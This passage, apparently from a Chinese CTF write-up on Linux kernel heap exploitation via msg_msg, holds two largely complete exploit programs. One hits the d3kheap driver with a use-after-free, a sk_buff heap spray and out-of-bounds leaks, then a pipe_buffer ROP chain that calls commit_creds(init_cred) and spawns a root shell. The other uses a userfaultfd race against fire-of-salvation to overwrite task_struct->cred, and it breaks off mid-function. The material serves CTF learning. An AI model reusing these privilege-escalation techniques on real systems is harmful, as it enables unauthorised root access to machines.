((struct msg_msg *) msg)->m_type = (long) m_type;
((struct msg_msg *) msg)->m_ts = m_ts;
((struct msg_msg *) msg)->next = (void *) next;
((struct msg_msg *) msg)->security = (void *) security;
}

struct {
long mtype;
char mtext[DATALEN_MSG + DATALEN_SEG];
} oob_msgbuf;

#define SOCKET_NUM 8
#define SK_BUFF_NUM 128

/*
 * Fill sk_socket with SOCKET_NUM connected AF_UNIX stream socket pairs.
 * Returns 0 on success; on the first failure prints a message naming the
 * pair and returns -1 (pairs created before that stay open).
 */
int init_socket_array(int sk_socket[SOCKET_NUM][2]) {
    int idx = 0;

    while (idx < SOCKET_NUM) {
        int rc = socketpair(AF_UNIX, SOCK_STREAM, 0, sk_socket[idx]);

        if (rc < 0) {
            printf("[x] failed to create no.%d socket pair!\n", idx);
            return -1;
        }
        idx++;
    }
    return 0;
}

/*
 * Write the same size-byte buffer SK_BUFF_NUM times into end [0] of each
 * of the SOCKET_NUM socket pairs, pair by pair.
 * Returns 0 on success; on the first failed write prints which write and
 * which pair failed and returns -1.
 */
int spray_sk_buff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size) {
    for (int n = 0; n < SOCKET_NUM * SK_BUFF_NUM; n++) {
        int pair = n / SK_BUFF_NUM;
        int nth = n % SK_BUFF_NUM;

        if (write(sk_socket[pair][0], buf, size) < 0) {
            printf("[x] failed to spray %d sk_buff for %d socket!", nth, pair);
            return -1;
        }
    }
    return 0;
}

/*
 * Counterpart of spray_sk_buff(): read up to size bytes into buf
 * SK_BUFF_NUM times from end [1] of each of the SOCKET_NUM socket pairs,
 * pair by pair. buf is overwritten on every read.
 * Returns 0 on success, or -1 after printing a message on the first
 * failed read.
 */
int free_sk_buff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size) {
    for (int n = 0; n < SOCKET_NUM * SK_BUFF_NUM; n++) {
        int pair = n / SK_BUFF_NUM;

        if (read(sk_socket[pair][1], buf, size) < 0) {
            puts("[x] failed to received sk_buff!");
            return -1;
        }
    }
    return 0;
}

struct page;
struct pipe_inode_info;
struct pipe_buf_operations;

/* read start from len to offset, write start from offset */
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

struct pipe_buf_operations {
/*
* ->confirm() verifies that the data in the pipe buffer is there
* and that the contents are good. If the pages in the pipe belong
* to a file system, we may need to wait for IO completion in this
* hook. Returns 0 for good, or a negative error value in case of
* error. If not present all pages are considered good.
*/
int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* When the contents of this pipe buffer has been completely
* consumed by a reader, ->release() is called.
*/
void (*release)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Attempt to take ownership of the pipe buffer and its contents.
* ->try_steal() returns %true for success, in which case the contents
* of the pipe (the buf->page) is locked and now completely owned by the
* caller. The page may then be transferred to a different mapping, the
* most often used case is insertion into different file address space
* cache.
*/
int (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Get a reference to the pipe buffer.
*/
int (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};

/*
 * Report whether addr lies in [0xFFFFFFFF80000000, 0xFFFFFFFFFEFFFFFF],
 * the range this program treats as kernel image addresses.
 * (A tighter upper bound of 0xFFFFFFFF9FFFFFFF was tried earlier.)
 */
bool is_kernel_text_addr(size_t addr) {
    const size_t lowest = 0xFFFFFFFF80000000;
    const size_t highest = 0xFFFFFFFFFEFFFFFF;

    if (addr < lowest) {
        return false;
    }
    return addr <= highest;
}

/*
 * Report whether addr lies in [0xFFFF888000000000, 0xFFFFc87FFFFFFFFF],
 * the range this program treats as direct-mapping (heap) addresses.
 */
bool is_dir_mapping_addr(size_t addr) {
    const size_t lowest = 0xFFFF888000000000;
    const size_t highest = 0xFFFFc87FFFFFFFFF;

    if (addr < lowest) {
        return false;
    }
    return addr <= highest;
}

void get_shell() { system("cat flag;/bin/sh"); }

int d3heap_fd;

void chunk_add() {
ioctl(d3heap_fd, 0x1234);
}

void chunk_delete() {
ioctl(d3heap_fd, 0xdead);
}

#define PRIMARY_MSG_SIZE 0x60
#define SECONDARY_MSG_SIZE 0x400
#define PIPE_NUM 256
#define HEAP_SIZE 1024
#define MSG_QUE_NUM 4096
#define MSG_TAG 0x1145141919810

size_t init_cred = 0xffffffff82c6d580;
size_t commit_creds = 0xffffffff810d25c0;
size_t swapgs_restore_regs_and_return_to_usermode = 0xffffffff81c00ff0;
size_t pop_rdi_ret = 0xffffffff810938f0;
size_t push_rsi_pop_rsp_pop_rbx_pop_r12_pop_r13_pop_rbp_ret = 0xffffffff812dbede;

struct {
long mtype;
char mtext[SECONDARY_MSG_SIZE - sizeof(struct msg_msg)];
} msgbuf;


char fake_msg[704];

/*
 * Driver for "method 2" of the write-up: the same overall flow as method
 * 1, but the object is rewritten through socket buffers (spray_sk_buff /
 * free_sk_buff) instead of setxattr. The steps are strictly
 * order-dependent; statements must not be reordered.
 *
 * NOTE(review): comments that describe what the kernel does in response
 * are taken from the surrounding article, not from this code; treat them
 * as the author's stated intent.
 */
int main() {
bind_core(0);
save_status();
int sk_sockets[SOCKET_NUM][2];
/* NOTE(review): neither this return value nor the open() result below is checked. */
init_socket_array(sk_sockets);
d3heap_fd = open("/dev/d3kheap", O_RDONLY);
int msqid[MSG_QUE_NUM];
for (int i = 0; i < MSG_QUE_NUM; i++) {
if ((msqid[i] = get_msg_queue()) < 0) {
puts("[-] mdgget failed.");
exit(-1);
}
}

/*
 * Step 1: add ioctl, then one message per queue. Header plus text is
 * SECONDARY_MSG_SIZE bytes and every message carries m_type MSG_TAG.
 * The delete ioctl is issued once, right after the message for queue
 * MSG_QUE_NUM / 2 has been sent.
 */
chunk_add();

for (int i = 0; i < MSG_QUE_NUM; i++) {
memset(msgbuf.mtext, 'A' + (i % 26), sizeof(msgbuf.mtext));
if (write_msg(msqid[i], &msgbuf, sizeof(msgbuf.mtext), MSG_TAG) < 0) {
puts("[-] msgnd failed.");
exit(-1);
}
if (i == MSG_QUE_NUM / 2) {
chunk_delete();
}
}

/*
 * Step 2: second delete ioctl, then spray a fake header whose m_ts is -1
 * (the largest size_t value). A MSG_COPY read with a normal-sized buffer
 * fails only on the queue whose message now carries that header, which
 * is how the affected queue is identified.
 * NOTE(review): the loop does not stop at the first failure, so the last
 * failing queue wins, and any unrelated msgrcv error is also counted.
 */
chunk_delete();

build_msg(fake_msg, 0, 0, 0, -1, 0, 0);
if (spray_sk_buff(sk_sockets, fake_msg, sizeof(fake_msg)) < 0) {
puts("[-] failed to spary sk_buff.");
exit(-1);
}
int victim_qid = -1;
for (int i = 0; i < MSG_QUE_NUM; i++) {
if (peek_msg(msqid[i], &msgbuf, sizeof(msgbuf.mtext), 0) < 0) {
printf("[+] victim qid: %d\n", i);
victim_qid = i;
}
}
if (victim_qid == -1) {
puts("[-] failed to find uaf msg_queue.");
exit(-1);
}
if (free_sk_buff(sk_sockets, fake_msg, sizeof(fake_msg)) < 0) {
puts("[-] failed to release sk_buff.");
exit(-1);
}

/* Step 3: respray with m_ts = DATALEN_MSG and read past the end of the object. */
memset(fake_msg, '#', sizeof(fake_msg));
build_msg(fake_msg, 0, 0, 0, DATALEN_MSG, 0, 0);
if (spray_sk_buff(sk_sockets, fake_msg, sizeof(fake_msg)) < 0) {
puts("[-] failed to spary sk_buff.");
exit(-1);
}
if (peek_msg(msqid[victim_qid], &oob_msgbuf, DATALEN_MSG, 0) < 0) {
puts("[-] failed to peek msg.");
exit(-1);
}
printf("[*] oob_msgbuf.mtype: %ld\n", oob_msgbuf.mtype);
qword_dump("try to find nearby secondary msg", oob_msgbuf.mtext, DATALEN_MSG);

size_t nearby_msg_que = 0;
int msg_msg_offset = 0;
/*
 * Look at every HEAP_SIZE-aligned position after the first object for one
 * of our own headers: tagged type, no segment, next == prev pointing into
 * the direct mapping, and our text size.
 * NOTE(review): the debug printf below passes a long to %p.
 */
for (int i = sizeof(msgbuf.mtext); i < DATALEN_MSG; i += HEAP_SIZE) {
struct msg_msg *msg_msg = (void *) &oob_msgbuf.mtext[i];
printf("type: %p\n", msg_msg->m_type);
if (msg_msg->m_type == MSG_TAG && msg_msg->next == NULL
&& is_dir_mapping_addr((size_t) msg_msg->m_list.prev)
&& msg_msg->m_list.prev == msg_msg->m_list.next
&& msg_msg->m_ts == sizeof(msgbuf.mtext)) {
nearby_msg_que = (size_t) msg_msg->m_list.next;
/* Distance from the start of the first object to the header that was found. */
msg_msg_offset = i + sizeof(struct msg_msg);
printf("[+] nearby msg_queue: %p\n", nearby_msg_que);
break;
}
}

if (!nearby_msg_que) {
puts("[-] failed to find nearby msg_queue.");
exit(-1);
}
if (free_sk_buff(sk_sockets, fake_msg, sizeof(fake_msg)) < 0) {
puts("[-] failed to release sk_buff.");
exit(-1);
}

/*
 * Step 4: one-segment read starting 8 bytes before the leaked list head,
 * so the segment data returned at mtext[DATALEN_MSG] starts at the list
 * head itself; its first qword is the neighbour message's address, from
 * which the first object's own address is derived.
 * NOTE(review): m_ts is DATALEN_MSG + DATALEN_MSG while the read size
 * below is DATALEN_MSG + DATALEN_SEG; probably DATALEN_SEG was intended.
 * The smaller value still passes the size check.
 */
build_msg(fake_msg, 0, 0, 0, DATALEN_MSG + DATALEN_MSG, nearby_msg_que - 8, 0);
if (spray_sk_buff(sk_sockets, fake_msg, sizeof(fake_msg)) < 0) {
puts("[-] failed to spary sk_buff.");
exit(-1);
}
if (peek_msg(msqid[victim_qid], &oob_msgbuf, DATALEN_MSG + DATALEN_SEG, 0) < 0) {
puts("[-] failed to peek msg.");
exit(-1);
}
printf("[*] oob_msgbuf.mtype: %ld\n", oob_msgbuf.mtype);
qword_dump("leak msg_msg addr", &oob_msgbuf.mtext[DATALEN_MSG], DATALEN_SEG);
size_t victim_addr = *(size_t *) &oob_msgbuf.mtext[DATALEN_MSG] - msg_msg_offset;
printf("[+] victim addr: %p\n", victim_addr);

/*
 * Step 5: restore a consistent header (type 1, real text size, no
 * segment) and receive the message normally, which frees it.
 * NOTE(review): victim_addr + 0x800 is presumably just some mapped,
 * writable address for the unlink to write to; confirm.
 */
if (free_sk_buff(sk_sockets, fake_msg, sizeof(fake_msg)) < 0) {
puts("[-] failed to release sk_buff.");
exit(-1);
}
build_msg(fake_msg, victim_addr + 0x800, victim_addr + 0x800, 1, sizeof(msgbuf.mtext), 0, 0);
if (spray_sk_buff(sk_sockets, fake_msg, sizeof(fake_msg)) < 0) {
puts("[-] failed to spary sk_buff.");
exit(-1);
}
if (read_msg(msqid[victim_qid], &msgbuf, sizeof(msgbuf.mtext), 1) < 0) {
puts("[-] failed to release secondary msg.");
exit(-1);
}

/* Step 6: create PIPE_NUM pipes and write a few bytes into each one. */
int pipe_fd[PIPE_NUM][2];
for (int i = 0; i < PIPE_NUM; i++) {
if (pipe(pipe_fd[i]) < 0) {
puts("[-] failed to create pipe.");
exit(-1);
}
if (write(pipe_fd[i][1], "sky123", 6) < 0) {
puts("[-] failed to write pipe.");
exit(-1);
}
}

/*
 * Step 7: drain every sprayed buffer back into fake_msg. A buffer whose
 * bytes, viewed as a struct pipe_buffer, hold a kernel-range ops pointer
 * yields the kernel offset (relative to the hard-coded 0xffffffff8203fe40).
 * Reading continues after a hit, so fake_msg ends up holding the last
 * buffer read, not necessarily the one that matched.
 */
size_t kernel_offset = -1;
struct pipe_buffer *pipe_buf = (struct pipe_buffer *) &fake_msg;
for (int i = 0; i < SOCKET_NUM; i++) {
for (int j = 0; j < SK_BUFF_NUM; j++) {
if (read(sk_sockets[i][1], &fake_msg, sizeof(fake_msg)) < 0) {
puts("[-] failed to release sk_buff.");
exit(-1);
}
if (is_kernel_text_addr((size_t) pipe_buf->ops)) {
qword_dump("leak pipe_buf_operations addr", fake_msg, sizeof(fake_msg));
printf("[+] leak pipe_buf_operations addr: %p\n", pipe_buf->ops);
kernel_offset = (size_t) pipe_buf->ops - 0xffffffff8203fe40;
printf("[+] kernel offset: %p\n", kernel_offset);
}
}
}
if (kernel_offset == -1) {
puts("[-] failed to leak kernel addr.");
exit(-1);
}
/* Relocate every hard-coded kernel address by the recovered offset. */
init_cred += kernel_offset;
commit_creds += kernel_offset;
swapgs_restore_regs_and_return_to_usermode += kernel_offset;
pop_rdi_ret += kernel_offset;
push_rsi_pop_rsp_pop_rbx_pop_r12_pop_r13_pop_rbp_ret += kernel_offset;

/*
 * Step 8: lay out the final payload inside fake_msg: ops points 0x100
 * bytes into the same object, where only the release slot is filled in,
 * and the chain of return addresses starts at offset 0x20.
 */
pipe_buf->page = (void *) 0xdeadbeef;
pipe_buf->ops = (void *) (victim_addr + 0x100);
((struct pipe_buf_operations *) &fake_msg[0x100])->release = (void *) push_rsi_pop_rsp_pop_rbx_pop_r12_pop_r13_pop_rbp_ret;

int rop_idx = 0;
size_t *rop = (size_t *) &fake_msg[0x20];
rop[rop_idx++] = pop_rdi_ret;
rop[rop_idx++] = init_cred;
rop[rop_idx++] = commit_creds;
rop[rop_idx++] = swapgs_restore_regs_and_return_to_usermode + 0x16;
/* Two filler slots, then the saved user-mode context captured by save_status(). */
rop[rop_idx++] = 0;
rop[rop_idx++] = 0;
rop[rop_idx++] = (size_t) get_shell;
rop[rop_idx++] = user_cs;
rop[rop_idx++] = user_rflags;
rop[rop_idx++] = user_sp;
rop[rop_idx++] = user_ss;

if (spray_sk_buff(sk_sockets, fake_msg, sizeof(fake_msg)) < 0) {
puts("[-] failed to spary sk_buff.");
exit(-1);
}

/* Closing the pipes is what, per the article, invokes ops->release on the rewritten buffer. */
for (int i = 0; i < PIPE_NUM; i++) {
close(pipe_fd[i][0]);
close(pipe_fd[i][1]);
}

return 0;
}

任意地址写(结合 userfaultfd 或 FUSE 完成 race condition write)

当我们调用 msgsnd 系统调用时,其会调用 load_msg() 将用户空间数据拷贝到内核空间中,首先是调用 alloc_msg() 分配 msg_msg 单向链表,之后才是正式的拷贝过程,即空间的分配与数据的拷贝是分开进行的。

我们不难想到的是,在拷贝时利用 userfaultfd/FUSE 将拷贝停下来,在子进程中篡改 msg_msg 的 next 指针,在恢复拷贝之后便会向我们篡改后的目标地址上写入数据,从而实现任意地址写。

例题:corCTF2021 fire-of-salvation

附件下载链接

一个防火墙驱动,可以添加编辑和删除规则,对应 kmalloc-4k 的 object 的添加编辑和删除。另外还有 firewall_dup 操作将流量入口或出口规则复制一份到出口或入口,即 object 指针复制一份到另一个列表,因此存在任意次 UAF。

首先创建 msg_msg 并且通过 UAF 修改 m_ts,越界读堆喷的 shm_file_data 以泄露内核基址。这里由于 firewall_edit 功能在 IP/Netmask 格式错误的时候只修改前 0x20 字节,因此不会覆盖到 msg_msg 的 next 指针。

由于本题目开启了 FG_KASLR 保护,无法通过泄露内核基址确定 commit_creds 以及相关 gadget 的地址,因此需要采用修改 task_struct 的 cred 指针为 init_cred 地址的方式提权。搜索本进程 task_struct 的方法有两种:一是通过 prctl(PR_SET_NAME, "sky123"); 修改 task_struct 的 comm 字段,然后利用类似 D^3CTF2022 - d3kheap 的方法搜索 comm 字段来定位 task_struct;另一种方法是从 init_task 开始通过 tasks 双向链表遍历进程,通过判断 pid 的方式定位。这里采用第二种方法。
需要注意的是,为了确保 msg_msgseg 的 next 指针为 NULL,在内存搜索时需要将 msg_msgseg 构造到 &task_struct.tasks - 8 的位置,当按照 task_struct.tasks.prev 遍历 tasks 链表的时候该位置很大概率为 NULL(新创建的进程都是从 init_task.tasks.prev 添加的,因此基本上第一个就是自身进程)。

之后创建一个新的 msg_queue,然后 msgsnd 添加一个 msg_msg,在 copy_from_user 阶段用 userfaultfd 卡住,然后 UAF 修改 next 为 &task_struct.cred - 0x10(确保 msg_msgseg 的 next 为 NULL),从而写入 init_cred 地址实现提权。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <ctype.h>
#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <pthread.h>
#include <sched.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/mman.h>
#include <sys/msg.h>
#include <sys/shm.h>
#include <sys/syscall.h>
#include <unistd.h>


/* Restrict the process identified by getpid() to the single CPU `core`. */
void bind_core(int core) {
    cpu_set_t mask;
    pid_t self = getpid();

    CPU_ZERO(&mask);
    CPU_SET(core, &mask);
    /* The result is deliberately not checked, as in the rest of this file. */
    sched_setaffinity(self, sizeof(mask), &mask);
}

/*
 * Hex/ASCII dump of `len` bytes at `addr`, four 64-bit words per row.
 *
 * desc: optional heading printed before the dump (NULL to omit it).
 * addr: start of the region to dump.
 * len:  number of bytes; only whole 8-byte words produce rows.
 */
void qword_dump(char *desc, void *addr, int len) {
    uint64_t *words = (uint64_t *) addr;
    uint8_t *bytes = (uint8_t *) addr;
    int word_count = len / 8;

    if (desc != NULL) {
        printf("[*] %s:\n", desc);
    }
    for (int row = 0; row < word_count; row += 4) {
        int base = row * 8; /* byte offset of this row */

        printf(" %04x", base);
        for (int col = 0; col < 4; col++) {
            if (row + col < word_count) {
                printf(" 0x%016lx", words[row + col]);
            } else {
                printf(" ");
            }
        }
        printf(" ");
        /* ASCII column: up to 32 bytes, never past the end of the region. */
        for (int off = 0; off < 32 && base + off < len; off++) {
            uint8_t ch = bytes[base + off];
            printf("%c", isprint(ch) ? ch : '.');
        }
        puts("");
    }
}

/*
 * Return true when `addr` lies in [0xFFFFFFFF80000000, 0xFFFFFFFFFEFFFFFF].
 * A tighter upper bound of 0xFFFFFFFF9FFFFFFF was considered by the author
 * but is not used.
 */
bool is_kernel_text_addr(size_t addr) {
    const size_t lowest = 0xFFFFFFFF80000000;
    const size_t highest = 0xFFFFFFFFFEFFFFFF;

    if (addr < lowest) {
        return false;
    }
    return addr <= highest;
}

/* Return true when `addr` lies in [0xFFFF888000000000, 0xFFFFc87FFFFFFFFF]. */
bool is_dir_mapping_addr(size_t addr) {
    const size_t lowest = 0xFFFF888000000000;
    const size_t highest = 0xFFFFc87FFFFFFFFF;

    if (addr < lowest) {
        return false;
    }
    return addr <= highest;
}

/* Sentinel returned when no offset could be derived from a value. */
#define INVALID_KERNEL_OFFSET 0x1145141919810

/* Known un-slid addresses that a leaked value is compared against. */
const size_t kernel_addr_list[] = {
    0xffffffff81c3d7a0,
    0xffffffff81a0d0e0,
};

/*
 * Try to derive the slide of a leaked kernel-text value.
 *
 * A candidate from kernel_addr_list matches when the low 12 bits are equal
 * and the difference is a multiple of 0x100000. Returns that difference, or
 * INVALID_KERNEL_OFFSET when the value is not a kernel-text address or
 * matches no candidate (the latter case is also logged).
 */
size_t kernel_offset_query(size_t kernel_text_leak) {
    const size_t candidates = sizeof(kernel_addr_list) / sizeof(kernel_addr_list[0]);

    if (is_kernel_text_addr(kernel_text_leak)) {
        for (size_t idx = 0; idx < candidates; idx++) {
            size_t known = kernel_addr_list[idx];
            size_t delta = kernel_text_leak - known;

            if (((kernel_text_leak ^ known) & 0xFFF) != 0) {
                continue;
            }
            if (delta % 0x100000 == 0) {
                return delta;
            }
        }
        printf("[-] unknown kernel addr: %#lx\n", kernel_text_leak);
    }
    return INVALID_KERNEL_OFFSET;
}

/*
 * Scan `len` bytes at `buf` as an array of 8-byte words and return the first
 * offset that kernel_offset_query() accepts, or INVALID_KERNEL_OFFSET when no
 * word yields one.
 */
size_t search_kernel_offset(void *buf, int len) {
    size_t *words = buf;
    int word_count = len / 8;
    int pos = 0;

    while (pos < word_count) {
        size_t found = kernel_offset_query(words[pos]);

        if (found == INVALID_KERNEL_OFFSET) {
            pos++;
            continue;
        }
        printf("[+] kernel leak addr: %#lx\n", words[pos]);
        printf("[+] kernel offset: %#lx\n", found);
        return found;
    }
    return INVALID_KERNEL_OFFSET;
}

/* Doubly linked list node: two pointers, `next` first. */
struct list_head {
    struct list_head *next;
    struct list_head *prev;
};

/*
 * Userland mirror of the header placed in front of every message.
 * The message text follows the header immediately.
 */
struct msg_msg {
    struct list_head m_list;
    long m_type;
    size_t m_ts;    /* message text size */
    void *next;     /* really a struct msg_msgseg * */
    void *security; /* NULL without SELinux */
};

/* Header of a continuation segment; the segment's data follows immediately. */
struct msg_msgseg {
    struct msg_msgseg *next;
};

/* Fallback definition for headers that do not expose MSG_COPY. */
#ifndef MSG_COPY
#define MSG_COPY 040000
#endif

#define PAGE_SIZE 0x1000
/* Bytes of text that fit in one page after the respective header. */
#define DATALEN_MSG ((size_t) PAGE_SIZE - sizeof(struct msg_msg))
#define DATALEN_SEG ((size_t) PAGE_SIZE - sizeof(struct msg_msgseg))

/* Create a private message queue (mode 0666) and return msgget()'s result. */
int get_msg_queue(void) {
    int msqid = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
    return msqid;
}

/* Receive a message of type `msgtyp` with no flags; returns msgrcv()'s result. */
long read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
    const int no_flags = 0;
    long received = msgrcv(msqid, msgp, msgsz, msgtyp, no_flags);
    return received;
}

/*
 * Store `msgtyp` in the leading `long` of the buffer at `msgp`, then send
 * `msgsz` bytes of text with msgsnd() (no flags). Returns msgsnd()'s result.
 */
int write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
    long *type_slot = msgp; /* mtype is the first member of the buffer */

    *type_slot = msgtyp;
    return msgsnd(msqid, msgp, msgsz, 0);
}

/*
 * Non-destructive, non-blocking receive: calls msgrcv() with
 * MSG_COPY | IPC_NOWAIT | MSG_NOERROR. Returns msgrcv()'s result.
 */
long peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
    const int peek_flags = MSG_COPY | IPC_NOWAIT | MSG_NOERROR;
    return msgrcv(msqid, msgp, msgsz, msgtyp, peek_flags);
}

void build_msg(void *msg, uint64_t m_list_next, uint64_t m_list_prev,
uint64_t m_type, uint64_t m_ts, uint64_t next, uint64_t security) {
((struct msg_msg *) msg)->m_list.next = (void *) m_list_next;
((struct msg_msg *) msg)->m_list.prev = (void *) m_list_prev;
((struct msg_msg *) msg)->m_type = (long) m_type;
((struct msg_msg *) msg)->m_ts = m_ts;
((struct msg_msg *) msg)->next = (void *) next;
((struct msg_msg *) msg)->security = (void *) security;
}

/*
 * Receive buffer for peek_msg(): a type field followed by room for one full
 * message part plus one full segment part (DATALEN_MSG + DATALEN_SEG bytes).
 */
struct {
long mtype;
char mtext[DATALEN_MSG + DATALEN_SEG];
} oob_msgbuf;


/*
 * Create a userfaultfd, register [addr, addr + len) for missing-page faults
 * and start `handler` in a new thread, passing the descriptor as its argument.
 * Any failing step prints its message and terminates the process.
 */
void register_userfaultfd(void *addr, size_t len, void *(*handler)(void *) ) {
    static pthread_t monitor_thread;
    const char *failure;
    struct uffdio_api api_req = {.api = UFFD_API, .features = 0};
    struct uffdio_register reg_req = {
        .range = {.start = (unsigned long) addr, .len = len},
        .mode = UFFDIO_REGISTER_MODE_MISSING,
    };

    long uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    failure = "[-] Error at: userfaultfd";
    if (uffd == -1) {
        goto die;
    }

    failure = "[-] Error at: ioctl-UFFDIO_API";
    if (ioctl(uffd, UFFDIO_API, &api_req) == -1) {
        goto die;
    }

    failure = "[-] Error at: ioctl-UFFDIO_REGISTER";
    if (ioctl(uffd, UFFDIO_REGISTER, &reg_req) == -1) {
        goto die;
    }

    failure = "[-] Error at: pthread_create";
    if (pthread_create(&monitor_thread, NULL, handler, (void *) uffd) != 0) {
        goto die;
    }
    return;

die:
    puts(failure);
    exit(-1);
}

/*
 * Argument structure handed to every ioctl on firewall_fd.
 * NOTE(review): the field order and sizes presumably have to match the
 * driver's own definition, which is not part of this file - do not reorder.
 */
typedef struct {
char iface[16];
char name[16];
char ip[16];      /* dotted-quad text, e.g. "0.0.0.0" (see add_rule) */
char netmask[16]; /* dotted-quad text */
uint8_t idx;      /* rule slot */
uint8_t type;     /* INBOUND or OUTBOUND */
uint16_t proto;
uint16_t port;
uint8_t action;
char desc[0x800];
} user_rule_t;


/* Descriptor of /dev/firewall; opened in main and used by all rule helpers. */
int firewall_fd;
/* Rule list selector stored in user_rule_t.type. */
enum {
INBOUND,
OUTBOUND
};

int add_rule(uint8_t idx, uint8_t type) {
return ioctl(firewall_fd, 0x1337BABE, &(user_rule_t){.type = type, .idx = idx, .ip = "0.0.0.0", .netmask = "0.0.0.0"});
}

int dup_rule(uint8_t idx, uint8_t type) {
return ioctl(firewall_fd, 0xBAAD5AAD, &(user_rule_t){.type = type, .idx = idx});
}

int delete_rule(uint8_t idx, uint8_t type) {
return ioctl(firewall_fd, 0xDEADBABE, &(user_rule_t){.type = type, .idx = idx});
}

/*
 * Format `val` as dotted-quad text into `buf`, least significant byte first
 * (0x0100007f becomes "127.0.0.1").
 *
 * buf: destination; needs at least 16 bytes ("255.255.255.255" plus NUL).
 * val: the four address bytes packed into a 32-bit value.
 *
 * The octets are unsigned, so they are printed with %u (the previous %d did
 * not match the argument type).
 */
void inet_ntoa(char *buf, uint32_t val) {
    unsigned int b0 = val & 0xFFu;
    unsigned int b1 = (val >> 8) & 0xFFu;
    unsigned int b2 = (val >> 16) & 0xFFu;
    unsigned int b3 = (val >> 24) & 0xFFu;

    sprintf(buf, "%u.%u.%u.%u", b0, b1, b2, b3);
}

int edit_rule(uint8_t idx, void *buf, uint8_t type, bool invalid) {
user_rule_t rule = {.type = type, .idx = idx};
memcpy(&rule, buf, 0x20);
if (invalid) {
strcpy(rule.ip, "invalid");
strcpy(rule.netmask, "invalid");
} else {
inet_ntoa(rule.ip, *(uint32_t *) &buf[0x20]);
inet_ntoa(rule.netmask, *(uint32_t *) &buf[0x24]);
}
memcpy(&rule.proto, &buf[0x28], 2);
memcpy(&rule.port, &buf[0x2a], 2);
memcpy(&rule.action, &buf[0x2c], 2);
return ioctl(firewall_fd, 0x1337BEEF, &rule);
}
/*
 * Message sent on the first queue in main. Its text is 0x18 bytes longer
 * than DATALEN_MSG (0x20 minus the segment header size).
 */
struct {
long mtype;
char mtext[DATALEN_MSG + 0x20 - sizeof(struct msg_msgseg)];
} msgbuf;

/* Scratch buffer in which fake msg_msg headers are built for edit_rule(). */
char fake_msg[0x2000];

/* Addresses before relocation; main adds the leaked kernel offset to both. */
size_t init_cred = 0xFFFFFFFF81C33060;
size_t init_task = 0xFFFFFFFF81C124C0;
/* Address of the current process's task_struct, found by main. */
size_t cur_task;

/*
 * Byte offsets inside task_struct used by main and handler_thread.
 * NOTE(review): presumably specific to the target kernel build - confirm.
 */
#define TASKS_OFFSET 0x298
#define PID_OFFSET 0x398
#define CRED_OFFSET 0x540


/*
 * userfaultfd monitor thread; `arg` carries the userfaultfd descriptor.
 *
 * Waits for the first page-fault event. While the faulting access is still
 * blocked it rewrites the object behind OUTBOUND rule 1 with a fake msg_msg
 * header whose `next` is cur_task + CRED_OFFSET - 0x10, then resolves the
 * fault with two pages that hold init_cred in the two 8-byte slots at
 * DATALEN_MSG and DATALEN_MSG + 8.
 *
 * Any failure prints a message and terminates the process. Returns NULL
 * after the fault has been resolved (the earlier version fell off the end
 * of this non-void function without a return value).
 */
void *handler_thread(void *arg) {
    long uffd = (long) arg;
    struct pollfd pollfd = {.fd = (int) uffd, .events = POLLIN};
    struct uffd_msg msg;

    if (poll(&pollfd, 1, -1) == -1) {
        puts("[-] Error at: poll");
        exit(-1);
    }

    ssize_t nread = read((int) uffd, &msg, sizeof(msg));
    if (nread == 0) {
        puts("[-] Error at: EOF on userfaultfd!");
        exit(EXIT_FAILURE);
    }
    if (nread == -1) {
        puts("[-] Error at: read");
        exit(-1);
    }
    if (msg.event != UFFD_EVENT_PAGEFAULT) {
        puts("[-] Unexpected event on userfaultfd");
        exit(EXIT_FAILURE);
    }

    /* Redirect the header's next pointer while the copy is paused. */
    build_msg(fake_msg, 0, 0, 1, DATALEN_MSG + 0x10, cur_task + CRED_OFFSET - 0x10, 0);
    edit_rule(1, fake_msg, OUTBOUND, false);

    char *page_buf = mmap(NULL, PAGE_SIZE * 2, PROT_READ | PROT_WRITE,
                          MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page_buf == MAP_FAILED) {
        puts("[-] Error at: mmap");
